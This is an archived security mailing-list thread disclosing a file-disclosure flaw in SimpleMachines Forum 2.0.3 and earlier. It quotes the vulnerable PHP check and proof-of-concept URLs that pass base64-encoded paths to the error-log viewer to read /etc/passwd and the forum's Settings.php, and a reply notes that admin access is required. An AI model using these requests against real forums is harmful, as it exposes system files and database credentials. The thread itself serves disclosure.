lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 8 Jan 2013 10:36:23 -0300
From: WHK Yan <yan.uniko.102@...il.com>
To: Carlos Alberto Lopez Perez <clopez@...lia.com>
Cc: vuln@...unia.com, submissions@...ketstormsecurity.com,
	submit@...ecurity.com, full-disclosure@...ts.grok.org.uk,
	mr.inj3ct0r@...il.com, vuldb@...urityfocus.com,
	oss-security@...ts.openwall.com
Subject: Re: File Disclosure in SimpleMachines Forum <=
	2.0.3

The flaw is not exploitable without privileges. On some occasions there are
forums where there are co-admistrators which have privileges to view the
error log but not to modify code or at least read the mysql connection.

Not have CVE-ID.

2013/1/8 Carlos Alberto Lopez Perez <clopez@...lia.com>

> On 07/01/13 15:54, WHK Yan wrote:
> > *Summary:*
> > --------------
> > A security flaw allows an attacker to know the full source file of the
> web
> > system.
> >
> > *Details:
> > -----------
> > Sources/ManageErrors.php Line 340:
> > // Make sure the file we are looking for is one they are allowed to look
> at
> > if (!is_readable($file) || (strpos($file, '../') !== false && (
> > strpos($file, $boarddir) === false || strpos($file, $sourcedir) ===
> false)))
> >     fatal_lang_error('error_bad_file', true,
> > array(htmlspecialchars($file)));
> >
> > Bypass function strpos($file, '../'), no need "../", example:
> > /home/foo/www/Settings.php
> >
> > *PoC:
> > -------
> >
> http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=
> > Read /etc/passwd
> >
> > works with path disclosure for read Settings.php:
> > http://whk.drawcoders.net/index.php/topic,2792.0.html
> >
> > *Reproduce:
> > 1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
> > 2. Get full path of web app ( /home/1337/public_html/SSI.php ).
> > 3. Exploit in base64:
> >
> http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=
> > To read /home/spadmin/public_html/Settings.php
> >
> > Referer and Mirror:
> > -------------------------
> > http://whk.drawcoders.net/index.php/topic,2805.0.html
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> Hi!
>
>
> I have verified SMF is affected by this issue.
>
> The PoC requires an admin login to be exploited. Is there any
> possibility to exploit this issue without an admin login?
>
>
> I guess a CVE should be assigned. Do you already asked for one?
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ